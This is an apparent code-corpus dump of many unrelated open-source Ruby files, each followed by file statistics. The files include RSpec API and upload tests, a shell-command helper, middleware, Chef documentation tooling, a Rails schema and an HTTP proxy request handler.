assert("Result does not contain string:query=[\"notanindex blue\"]",
result.xmldata.include?("query=[title:nosuchtitle]"))
end
def teardown
stop
end
end
| 29.722222 | 111 | 0.71215 |
38cde48ae22ec05b0ed4944701db4eb17b7e06d1 | 530 | require 'bundler'
module NightWatch
module Utilities
module ScriptRunner
def sh(command, return_std_out = false)
to_run = command.dup
to_run << ' 1>&2' unless return_std_out
$stderr.puts "run: #{command}"
$stderr.puts "in: #{`pwd`}"
output = Bundler.with_clean_env { `#{to_run}` }
$stderr.puts
raise "Error running command: #{command}\nExit status: #{$?.exitstatus}" unless $?.success?
output
end
module_function :sh
end
end
end
| 20.384615 | 99 | 0.596226 |
b969e17adacf4d2b39d8a5beab158d09a4e5e1d2 | 4,923 | #-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2017 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2017 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See doc/COPYRIGHT.rdoc for more details.
#++
require 'spec_helper'
require 'rack/test'
describe 'API v3 Version resource' do
include Rack::Test::Methods
include API::V3::Utilities::PathHelper
let(:current_user) do
user = FactoryGirl.create(:user,
member_in_project: project,
member_through_role: role)
allow(User).to receive(:current).and_return user
user
end
let(:role) { FactoryGirl.create(:role, permissions: [:view_work_packages]) }
let(:project) { FactoryGirl.create(:project, is_public: false) }
let(:other_project) { FactoryGirl.create(:project, is_public: false) }
let(:version_in_project) { FactoryGirl.build(:version, project: project) }
let(:version_in_other_project) do
FactoryGirl.build(:version, project: other_project,
sharing: 'system')
end
subject(:response) { last_response }
describe '#get (:id)' do
let(:get_path) { api_v3_paths.version version_in_project.id }
shared_examples_for 'successful response' do
it 'responds with 200' do
expect(last_response.status).to eq(200)
end
it 'returns the version' do
expect(last_response.body).to be_json_eql('Version'.to_json).at_path('_type')
expect(last_response.body).to be_json_eql(expected_version.id.to_json).at_path('id')
end
end
context 'logged in user with permissions' do
before do
version_in_project.save!
current_user
get get_path
end
it_should_behave_like 'successful response' do
let(:expected_version) { version_in_project }
end
end
context 'logged in user with permission on project a version is shared with' do
let(:get_path) { api_v3_paths.version version_in_other_project.id }
before do
version_in_other_project.save!
current_user
get get_path
end
it_should_behave_like 'successful response' do
let(:expected_version) { version_in_other_project }
end
end
context 'logged in user without permission' do
let(:role) { FactoryGirl.create(:role, permissions: []) }
before(:each) do
version_in_project.save!
current_user
get get_path
end
it_behaves_like 'unauthorized access'
end
end
describe '#get /versions' do
let(:get_path) { api_v3_paths.versions }
let(:response) { last_response }
let(:versions) { [version_in_project] }
before do
versions.map(&:save!)
current_user
get get_path
end
it 'succeeds' do
expect(last_response.status)
.to eql(200)
end
it_behaves_like 'API V3 collection response', 1, 1, 'Version'
it 'is the version the user has permission in' do
expect(response.body)
.to be_json_eql(api_v3_paths.version(version_in_project.id).to_json)
.at_path('_embedded/elements/0/_links/self/href')
end
context 'filtering for project by sharing' do
let(:shared_version_in_project) do
FactoryGirl.build(:version, project: project, sharing: 'system')
end
let(:versions) { [version_in_project, shared_version_in_project] }
let(:filter_query) do
[{ sharing: { operator: '=', values: ['system'] } }]
end
let(:get_path) do
"#{api_v3_paths.versions}?filters=#{CGI.escape(JSON.dump(filter_query))}"
end
it_behaves_like 'API V3 collection response', 1, 1, 'Version'
it 'returns the shared version' do
expect(response.body)
.to be_json_eql(api_v3_paths.version(shared_version_in_project.id).to_json)
.at_path('_embedded/elements/0/_links/self/href')
end
end
end
end
| 30.57764 | 92 | 0.680479 |
abfbdaa45fc015ad9f42c324ed877e5e94880697 | 2,870 | module Grape
module Middleware
# Class to handle the stack of middlewares based on ActionDispatch::MiddlewareStack
# It allows to insert and insert after
class Stack
class Middleware
attr_reader :args, :block, :klass
def initialize(klass, *args, &block)
@klass = klass
@args = args
@block = block
end
def name
klass.name
end
def ==(other)
case other
when Middleware
klass == other.klass
when Class
klass == other || (name.nil? && klass.superclass == other)
end
end
def inspect
klass.to_s
end
end
include Enumerable
attr_accessor :middlewares, :others
def initialize
@middlewares = []
@others = []
end
def each
@middlewares.each { |x| yield x }
end
def size
middlewares.size
end
def last
middlewares.last
end
def [](i)
middlewares[i]
end
def insert(index, *args, &block)
index = assert_index(index, :before)
middleware = self.class::Middleware.new(*args, &block)
middlewares.insert(index, middleware)
end
alias insert_before insert
def insert_after(index, *args, &block)
index = assert_index(index, :after)
insert(index + 1, *args, &block)
end
def use(*args, &block)
middleware = self.class::Middleware.new(*args, &block)
middlewares.push(middleware)
end
def merge_with(middleware_specs)
middleware_specs.each do |operation, *args|
if args.last.is_a?(Proc)
public_send(operation, *args, &args.pop)
else
public_send(operation, *args)
end
end
end
# @return [Rack::Builder] the builder object with our middlewares applied
def build(builder = Rack::Builder.new)
others.shift(others.size).each(&method(:merge_with))
middlewares.each do |m|
m.block ? builder.use(m.klass, *m.args, &m.block) : builder.use(m.klass, *m.args)
end
builder
end
# @description Add middlewares with :use operation to the stack. Store others with :insert_* operation for later
# @param [Array] other_specs An array of middleware specifications (e.g. [[:use, klass], [:insert_before, *args]])
def concat(other_specs)
@others << Array(other_specs).reject { |o| o.first == :use }
merge_with(Array(other_specs).select { |o| o.first == :use })
end
protected
def assert_index(index, where)
i = index.is_a?(Integer) ? index : middlewares.index(index)
i || raise("No such middleware to insert #{where}: #{index.inspect}")
end
end
end
end
| 25.855856 | 120 | 0.573519 |
1d23457e9ae31036e8cf92ede356d9d7f4244426 | 64 | module GoogleFinance
class Resource < Hashie::Trash
end
end
| 12.8 | 32 | 0.765625 |
91a681e8038c6e8a50413a7b403e675ae1192755 | 3,706 | # Copyright (c) 2012 RightScale, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# 'Software'), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
require 'yard'
module YARD::CodeObjects
module Chef
# A ChefObject is an abstract implementation of all chef elements
# (cookbooks, resources, providers, recipes, attributes and actions).
#
class ChefObject < YARD::CodeObjects::ClassObject
# Returns the formatting type of docstring (Example: :markdown, :rdoc).
#
# @return [Symbol, String] formatting type
#
attr_reader :docstring_type
# Creates a new ChefObject object.
#
# @param namespace [NamespaceObject] namespace to which the object belongs
# @param name [String] name of the ChefObject
#
# @return [ChefObject] the newly created ChefObject
#
def initialize(namespace, name)
super(namespace, name)
@docstring_type = :markdown
end
# Register a chef element class.
#
# @param element [Class] chef element class
#
def self.register_element(element)
@@chef_elements ||= {}
@@chef_elements[element] = self
end
# Factory for creating and registering chef element object in
# YARD::Registry.
#
# @param namespace [NamespaceObject] namespace to which the object must
# belong
# @param name [String] name of the chef element
# @param type [Symbol, String] type of the chef element
#
# @return [<type>Object] the element object
#
def self.register(namespace, name, type)
element = @@chef_elements[type]
if element
element_obj = YARD::Registry.resolve(:root, "#{namespace}::#{name}")
if element_obj.nil?
element_obj = element.new(namespace, name)
log.info "Created [#{type.to_s.capitalize}]" +
" #{element_obj.name} => #{element_obj.namespace}"
end
element_obj
else
raise "Invalid chef element type #{type}"
end
end
# Returns children of an object of a particular type.
#
# @param type [Symbol] type of ChefObject to be selected
#
# @return [Array<ChefObject>] list of ChefObjects
#
def children_by_type(type)
children = YARD::Registry.all(type)
children.reject { |child| child.parent != self }
end
# Gets all Chef cookbooks.
#
# @return [Array<CookbookObject>] list of cookbooks.
#
def cookbooks
children_by_type(:cookbook)
end
end
# Register 'Chef' as the root namespace
CHEF = ChefObject.new(:root, 'chef')
log.info "Creating [Chef] as 'root' namespace"
end
end
| 34.314815 | 80 | 0.658662 |
622cf23f86caa13fe5e1f13363c2e843a8d97f4f | 774 | $:.push File.expand_path("../lib", __FILE__)
require "backtrail/version"
Gem::Specification.new do |s|
s.name = "backtrail"
s.version = Backtrail::VERSION
s.authors = ["Daniel Ferraz"]
s.email = ["[email protected]"]
s.homepage = "https://github.com/dferrazm/backtrail"
s.summary = "Keep a trail of request paths for your Rails application"
s.description = "Keep a trail of request paths for your Rails application"
s.license = "MIT"
s.files = `git ls-files`.split($/)
s.executables = s.files.grep(%r{^bin/}) { |f| File.basename(f) }
s.test_files = s.files.grep(%r{^(test|spec|features)/})
s.require_paths = ["lib"]
s.add_dependency 'railties', '>= 4.0'
s.add_development_dependency 'mocha'
end
| 33.652174 | 76 | 0.640827 |
793a2864310f546ebf5bf2ad2f5c41717dd480a8 | 792 | class UsersController < ApplicationController
get '/signup' do
if !logged_in?
erb :'users/signup'
else
flash[:message] = "Signed in as #{current_user.username}."
redirect to '/ideas'
end
end
post '/signup' do
@user = User.new(username: params[:username], password: params[:password])
if @user.save
session[:user_id] = @user.id
redirect to '/ideas'
else
flash[:messages] = @user.errors.full_messages
redirect to '/signup'
end
end
get '/users' do
@users = User.all
erb :'users/index'
end
get '/users/:slug' do
@user = User.find_by_slug(params[:slug])
erb :'users/show'
end
end
| 23.294118 | 82 | 0.527778 |
5df4fd3e1779aee16086c7b73f93fcbc1840d337 | 1,085 | StartUp::Application.routes.draw do
resources :posts do
resources :comments
end
namespace :admin do
root :to => 'home#index'
end
mount RailsAdmin::Engine => '/rails_admin', :as => 'rails_admin'
match 'district/:id' => 'district#show'
mount UeditorRails::Engine => '/ueditor'
post 'ueditor/file', :to => 'ueditor/assets#file'
post 'ueditor/image', :to => 'ueditor/assets#image'
# User friendly exception handling
match '/404', :to => 'errors#not_found'
match '/500', :to => 'errors#error_occurred'
devise_for :users, :controllers => { :omniauth_callbacks => 'users/omniauth_callbacks',
:registrations => 'users/registrations'} do
namespace :users do
match 'auth/:action/cancel', :to => 'omniauth_cancel_callbacks#:action', :as => 'cancel_omniauth_callback'
get 'binding', :to => 'registrations#binding'
post 'binding', :to => 'registrations#bind'
put 'profile', :to => 'profiles#update'
end
end
get 'profiles/:id' => 'users/profiles#show'
root :to => 'home#index'
end
| 31 | 112 | 0.639631 |
18673e21119ed958a9e9c6fe22b801a85ac5b4e6 | 4,354 | # frozen_string_literal: true
require File.expand_path("#{File.dirname(__FILE__)}/../../spec_helper")
describe Vk::Wall do
describe 'Basic' do
before :each do
@wall = FactoryBot.create(:wall, id: 1, domain: '1')
end
it 'should provide needed attributes' do
# Database fields
expect(@wall).to respond_to(:id, :domain, :last_message_id)
# Relations
expect(@wall).to respond_to(:cwlinks, :chats)
end
it 'should raise if domain is already taken' do
# Domain already taken exception
expect { FactoryBot.create(:wall, id: 3, domain: '1') }
.to raise_error(ActiveRecord::RecordInvalid)
end
end
describe 'Simple utils' do
before :each do
@wall1 = FactoryBot.create(:wall, id: 1, domain: 'club1')
@wall2 = FactoryBot.create(:wall, id: 2, domain: 'club2z')
@wall3 = FactoryBot.create(:wall, id: 3, domain: 'noclub15')
@wall4 = FactoryBot.create(:wall, id: 4, domain: 'noclubatall')
@wall5 = FactoryBot.create(:wall, id: 5, domain: 'club1554757')
end
it 'should define if wall is watched' do
chat1 = FactoryBot.create(:chat, id: 1, enabled: false)
FactoryBot.create(:cwlink, wall: @wall1, chat: chat1)
# disabled chats should be ignored
expect(@wall1.watched?).to be false
chat1.update_attribute(:enabled, true)
# enabled chat should be counted
expect(@wall1.reload.watched?).to be true
expect(@wall2.watched?).to be false
end
it 'should detect owner_id' do
expect(@wall1.owner_id).to eq '-1'
expect(@wall2.owner_id).to eq '0'
expect(@wall3.owner_id).to eq '0'
expect(@wall4.owner_id).to eq '0'
expect(@wall5.owner_id).to eq '-1554757'
end
end
describe 'Wall processing' do
before :each do
@wall = FactoryBot.create(
:wall,
id: 1, domain: 'test', last_message_id: 0
)
FactoryBot.create(:token, id: 1, key: 'nope')
fn = 'vk_informer_wall_spec/wall.get.1.json'
@stub = stub_request(:post, 'https://api.vk.com/method/wall.get')
.to_return(
body: File.read("#{File.dirname(__FILE__)}/../../fixtures/#{fn}")
)
end
after :each do
remove_request_stub(@stub)
end
it 'should process only new messages' do
expect(@wall.__send__(:new_messages).size).to eq 5
@wall.update_attribute(:last_message_id, 18_023)
expect(@wall.__send__(:new_messages).size).to eq 0
@wall.update_attribute(:last_message_id, 17_985)
expect(@wall.__send__(:new_messages).size).to eq 3
end
it 'should not process unwatched walls' do
expect_any_instance_of(Vk::Wall).not_to receive(:process)
Vk::Wall.process
end
it 'should disable private walls' do
chat = FactoryBot.create(:chat, id: 1, enabled: false)
allow(@wall)
.to receive(:http_load)
.and_raise(Faraday::Error.new('Access denied: this wall available only for community members'))
chat.walls << @wall
expect(chat.reload.walls.size).to eq 1
expect(@wall.__send__(:new_messages)).to eq []
expect(chat.reload.walls.size).to eq 0
end
end
describe 'Generate keyboard buttons' do
before(:each) do
@wall = FactoryBot.create(:wall, id: 1, domain: 'domain1')
end
it 'should prepare hash for /list command' do
row = @wall.keyboard_list
expect(row.length).to eq 1
expect(row).to be_instance_of(Array)
row.each do |button|
expect(button).to be_instance_of(Hash)
expect(button).to have_key(:text)
end
expect(row.first).to have_key(:url)
expect(row.first[:url]).to eq 'https://vk.com/domain1'
end
it 'should prepare hash for /delete command' do
row = @wall.keyboard_delete
expect(row.length).to eq 1
expect(row).to be_instance_of(Array)
row.each do |button|
expect(button).to be_instance_of(Hash)
expect(button).to have_key(:text)
end
expect(row.first).to have_key(:callback_data)
cd = nil
expect { cd = JSON.parse(row.first[:callback_data], symbolize_names: true) }.not_to raise_error
expect(cd).to be_instance_of(Hash)
expect(cd[:action]).to eq 'delete domain1'
expect(cd[:update]).to be true
end
end
end
| 29.221477 | 103 | 0.634589 |
5d4af6b56e01ae7ca91f9fa846c88c51ffcf89a8 | 67 | module Capybara
module Mechanize
VERSION = '1.1.0'
end
end
| 11.166667 | 21 | 0.671642 |
e87e33fa4e17d50a6fe3b9badc45bb66f0621cc6 | 792 | module Intrigue
module Ident
module SshCheck
class Dropbear < Intrigue::Ident::SshCheck::Base
def generate_checks
[
{ # SSH-2.0-dropbear_2016.74
:type => "fingerprint",
:category => "application",
:tags => ["SSHServer"],
:vendor => "Dropbear SSH Project",
:product => "Dropbear SSH",
:references => [],
:version => nil,
:match_type => :content_banner,
:match_content => /dropbear/i,
:dynamic_version => lambda { |x| _first_banner_capture(x, /^SSH-2.0-dropbear_([\d\.]+)\r\n$/i)},
:match_details => "banner",
:hide => false,
:inference => true
}
]
end
end
end
end
end
| 28.285714 | 108 | 0.489899 |
bb0a63f0fa2f609e41e5878b02409456a4c555f5 | 1,597 | require 'net/http'
require 'net/https'
require 'uri'
require 'rubygems'
require 'hpricot'
#
# Make it east to use some of the convenience methods using https
#
module Net
class HTTPS < HTTP
def initialize(address, port = nil)
super(address, port)
self.use_ssl = true
end
end
end
module GData
GOOGLE_LOGIN_URL = URI.parse('https://www.google.com/accounts/ClientLogin')
class Base
attr_reader :service, :source, :url
def initialize(service, source, url)
@service = service
@source = source
@url = url
end
def authenticate(email, password)
$VERBOSE = nil
response = Net::HTTPS.post_form(GOOGLE_LOGIN_URL,
{'Email' => email,
'Passwd' => password,
'source' => source,
'service' => service })
response.error! unless response.kind_of? Net::HTTPSuccess
@headers = {
'Authorization' => "GoogleLogin auth=#{response.body.split(/=/).last}",
'GData-Version' => '2',
'Content-Type' => 'application/atom+xml'
}
end
def request(path)
response, data = get(path)
data
end
def get(path)
response, data = http.get(path, @headers)
end
def post(path, entry)
ret = http.post(path, entry, @headers)
end
def put(path, entry)
h = @headers
h['X-HTTP-Method-Override'] = 'PUT' # just to be nice, add the method override
http.put(path, entry, h)
end
def http
conn = Net::HTTP.new(url, 80)
#conn.set_debug_output $stderr
conn
end
end
end
| 20.74026 | 84 | 0.595492 |
6a91d5fc11e8cba3d5ceb4633c5c3f6f5244946b | 2,118 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20180903203629) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
create_table "answers", force: :cascade do |t|
t.string "text", null: false
t.integer "gryffindor", null: false
t.integer "ravenclaw", null: false
t.integer "hufflepuff", null: false
t.integer "slytherin", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.integer "question_id", null: false
end
create_table "questions", force: :cascade do |t|
t.string "text", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "quiz_questions", force: :cascade do |t|
t.integer "quiz_id", null: false
t.integer "question_id", null: false
t.integer "answer_id", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "quizzes", force: :cascade do |t|
t.integer "user_id", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "users", force: :cascade do |t|
t.string "name", null: false
t.string "email", null: false
t.string "house_choice", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
end
| 36.517241 | 86 | 0.720491 |
7ac8defef34532b92fdb65a6a8c92eddd55a6e6b | 12,317 | require "and_feathers"
require "and_feathers/gzipped_tarball"
require "spec_helper"
require "tempfile"
describe CookbookUpload do
describe "#finish(user)" do
before do
create(:category, name: "Other")
end
let(:cookbook) do
JSON.dump("category" => "Other")
end
let(:user) do
create(:user)
end
it "creates a new cookbook if the given name is original and assigns it to a user" do
tarball = File.open("spec/support/cookbook_fixtures/redis-test-v1.tgz")
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
expect do
upload.finish
end.to change(user.owned_cookbooks, :count).by(1)
end
it "doesn't change the owner if a collaborator uploads a new version" do
tarball_one = File.open("spec/support/cookbook_fixtures/redis-test-v1.tgz")
tarball_two = File.open("spec/support/cookbook_fixtures/redis-test-v2.tgz")
CookbookUpload.new(user, cookbook: cookbook, tarball: tarball_one).finish
collaborator = create(:user)
CookbookUpload.new(collaborator, cookbook: cookbook, tarball: tarball_two).finish do |_, result|
expect(result.owner).to eql(user)
expect(result.owner).to_not eql(collaborator)
end
end
it "updates the existing cookbook if the given name is a duplicate" do
tarball_one = File.open("spec/support/cookbook_fixtures/redis-test-v1.tgz")
tarball_two = File.open("spec/support/cookbook_fixtures/redis-test-v2.tgz")
CookbookUpload.new(user, cookbook: cookbook, tarball: tarball_one).finish
update = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball_two)
expect do
update.finish
end.to_not change(Cookbook, :count)
end
it "creates a new version of the cookbook if the given name is a duplicate" do
tarball_one = File.open("spec/support/cookbook_fixtures/redis-test-v1.tgz")
tarball_two = File.open("spec/support/cookbook_fixtures/redis-test-v2.tgz")
cookbook_record = CookbookUpload.new(
user,
cookbook: cookbook,
tarball: tarball_one
).finish do |_, result|
result
end
update = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball_two)
expect do
update.finish
end.to change(cookbook_record.cookbook_versions, :count).by(1)
end
it "yields empty errors if the cookbook and tarball are workable" do
tarball = File.open("spec/support/cookbook_fixtures/redis-test-v1.tgz")
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors).to be_empty
end
context "privacy" do
after { ENV["ENFORCE_PRIVACY"] = nil }
it "returns an error if privacy is being enforced and a private cookbook is uploaded" do
ENV["ENFORCE_PRIVACY"] = "true"
tarball = File.open("spec/support/cookbook_fixtures/private-cookbook.tgz")
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages).to include("Private cookbook upload not allowed")
end
it "allows private cookbook uploads if private is not being enforced" do
ENV["ENFORCE_PRIVACY"] = "false"
tarball = File.open("spec/support/cookbook_fixtures/private-cookbook.tgz")
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors).to be_empty
end
end
it "yields the cookbook version if the cookbook and tarball are workable" do
tarball = File.open("spec/support/cookbook_fixtures/redis-test-v1.tgz")
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
version = upload.finish { |_, _, v| v }
expect(version).to be_present
end
it "yields the cookbook version when the tarball has uid/gid greater than 8^8" do
tarball = File.open("spec/support/cookbook_fixtures/big-gid.tgz")
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
version = upload.finish { |_, _, v| v }
expect(version).to be_present
end
it "yields the cookbook version if the README has no extension" do
tarball = File.open("spec/support/cookbook_fixtures/readme-no-extension.tgz")
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
version = upload.finish { |_, _, v| v }
expect(version).to be_present
end
it "yields an error if the version number is not a valid Chef version" do
tarball = build_cookbook_tarball("invalid_version") do |tar|
tar.file("metadata.json") { JSON.dump(name: "invalid_version", version: "1.2.3-rc4") }
tar.file("README.md") { "# Check for a bad version" }
end
upload = CookbookUpload.new(user, cookbook: "{}", tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(a_string_matching("not a valid Chef version"))
end
it "yields an error if the cookbook is not valid JSON" do
upload = CookbookUpload.new(user, cookbook: "ack!", tarball: "tarball")
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(I18n.t("api.error_messages.cookbook_not_json"))
end
it "yields an error if the tarball does not seem to be an uploaded File" do
upload = CookbookUpload.new(user, cookbook: "{}", tarball: "cool")
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(I18n.t("api.error_messages.tarball_has_no_path"))
end
it "yields an error if the tarball is not GZipped" do
tarball = File.open("spec/support/cookbook_fixtures/not-actually-gzipped.tgz")
upload = CookbookUpload.new(user, cookbook: "{}", tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(I18n.t("api.error_messages.tarball_not_gzipped"))
end
it "yields an error if the tarball is corrupted" do
tarball = File.open("spec/support/cookbook_fixtures/corrupted-tarball.tgz")
upload = CookbookUpload.new(user, cookbook: "{}", tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(I18n.t("api.error_messages.tarball_corrupt", error: "Damaged tar archive"))
end
it "yields an error if the tarball has no metadata.json entry" do
tarball = File.open("spec/support/cookbook_fixtures/no-metadata-or-readme.tgz")
upload = CookbookUpload.new(user, cookbook: "{}", tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(I18n.t("api.error_messages.missing_metadata"))
end
it "yields an error if the tarball has no README entry" do
tarball = File.open("spec/support/cookbook_fixtures/no-metadata-or-readme.tgz")
upload = CookbookUpload.new(user, cookbook: "{}", tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(I18n.t("api.error_messages.missing_readme"))
end
it "yields an error if the tarball has a zero-length README entry" do
tarball = File.open("spec/support/cookbook_fixtures/zero-length-readme.tgz")
upload = CookbookUpload.new(user, cookbook: "{}", tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(I18n.t("api.error_messages.missing_readme"))
end
it "yields an error if the tarball's metadata.json is not actually JSON" do
tarball = File.open("spec/support/cookbook_fixtures/invalid-metadata-json.tgz")
upload = CookbookUpload.new(user, cookbook: "{}", tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(I18n.t("api.error_messages.metadata_not_json"))
end
it "yields an error if the metadata.json has a malformed platforms hash" do
tarball = build_cookbook_tarball("bad_platforms") do |tar|
tar.file("metadata.json") { JSON.dump(name: "bad_platforms", platforms: "") }
end
upload = CookbookUpload.new(user, cookbook: "{}", tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(I18n.t("api.error_messages.invalid_metadata"))
end
it "yields an error if the metadata.json has a malformed dependencies hash" do
tarball = build_cookbook_tarball("bad_dependencies") do |tar|
tar.file("metadata.json") { JSON.dump(name: "bad_dependencies", dependencies: "") }
end
upload = CookbookUpload.new(user, cookbook: "{}", tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(I18n.t("api.error_messages.invalid_metadata"))
end
it "does not yield an error if the cookbook parameters do not specify a category" do
tarball = File.open("spec/support/cookbook_fixtures/redis-test-v1.tgz")
upload = CookbookUpload.new(user, cookbook: "{}", tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages).to be_empty
end
it "yields an error if the cookbook parameters specify an invalid category" do
tarball = File.open("spec/support/cookbook_fixtures/redis-test-v1.tgz")
upload = CookbookUpload.new(
user,
cookbook: '{"category": "Kewl"}',
tarball: tarball
)
errors = upload.finish { |e, _| e }
error_message = I18n.t(
"api.error_messages.non_existent_category",
category_name: "Kewl"
)
expect(errors.full_messages).to include(error_message)
end
it "yields an error if the version uniqueness database constraint is violated" do
tarball = File.open("spec/support/cookbook_fixtures/redis-test-v1.tgz")
user = create(:user)
CookbookUpload.new(user, cookbook: cookbook, tarball: tarball).finish
allow_any_instance_of(ActiveRecord::Validations::UniquenessValidator)
.to receive(:validate_each)
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
errors = upload.finish { |e, _| e }
message = %{
redis-test (0.1.0) already exists. A cookbook's version number must be
unique.
}.squish
expect(errors.full_messages).to include(message)
end
it "yields an error if any of the associated models have errors" do
tarball = File.open("spec/support/cookbook_fixtures/invalid-platforms-and-dependencies.tgz")
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors).to_not be_empty
end
context "bad tarballs" do
it "errors if tarball is a URL" do
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: "http://nope.example.com/some.tgz")
errors = upload.finish { |e, _| e }
expect(errors.full_messages).to include("Multipart POST part 'tarball' must be a file.")
end
it "errors if tarball is Base64 encoded" do
tarball = Base64.encode64("I'm a naughty file.")
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages).to include("Multipart POST part 'tarball' must be a file.")
end
end
it "strips self-dependencies out of cookbooks on upload" do
tarball = File.open("spec/support/cookbook_fixtures/with-self-dependency.tgz")
cookbook_record = CookbookUpload.new(
user,
cookbook: cookbook,
tarball: tarball
).finish do |_, result|
result
end
expect(cookbook_record.cookbook_versions.first.cookbook_dependencies.count).to eql(0)
end
it "passes the user to #publish_version" do
tarball = File.open("spec/support/cookbook_fixtures/with-self-dependency.tgz")
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
expect_any_instance_of(Cookbook).to receive(:publish_version!).with(anything, user)
upload.finish
end
end
end
| 35.909621 | 106 | 0.672323 |
62be1e5b4cdbd3f985dad3f6eb78647784dd7b7e | 1,988 | require 'forwardable'
module Billy
class RequestHandler
extend Forwardable
include Handler
def_delegators :stub_handler, :stub, :unstub
def_delegators :request_log, :requests
def handlers
@handlers ||= { stubs: StubHandler.new,
cache: CacheHandler.new,
proxy: ProxyHandler.new }
end
def handle_request(method, url, headers, body)
request = request_log.record(method, url, headers, body)
if Billy.config.before_handle_request
method, url, headers, body = Billy.config.before_handle_request.call(method, url, headers, body)
end
# Process the handlers by order of importance
[:stubs, :cache, :proxy].each do |key|
if (response = handlers[key].handle_request(method, url, headers, body))
@request_log.complete(request, key)
return response
end
end
body_msg = Billy.config.cache_request_body_methods.include?(method) ? " with body '#{body}'" : ''
request_log.complete(request, :error)
{ error: "Connection to #{url}#{body_msg} not cached and new http connections are disabled" }
rescue => error
{ error: error.message }
end
def handles_request?(method, url, headers, body)
[:stubs, :cache, :proxy].any? do |key|
handlers[key].handles_request?(method, url, headers, body)
end
end
def request_log
@request_log ||= RequestLog.new
end
def stubs
stub_handler.stubs
end
def reset
handlers.each_value(&:reset)
request_log.reset
end
def reset_stubs
stub_handler.reset
end
def reset_cache
handlers[:cache].reset
end
def restore_cache
warn '[DEPRECATION] `restore_cache` is deprecated as cache files are dynamically checked. Use `reset_cache` if you just want to clear the cache.'
reset_cache
end
private
def stub_handler
handlers[:stubs]
end
end
end
| 25.487179 | 151 | 0.64336 |
62b04c18da8b79c2d8b5f5ed7c7c6f7753312e2b | 18,840 | module GeoGeo
class Shape2D
# @return [Float]
attr_reader :left, :right, :bottom, :top, :width, :height
# @param [Float, Integer] left
# @param [Float, Integer] right
# @param [Float, Integer] bottom
# @param [Float, Integer] top
# @return [GeoGeo::Shape2D]
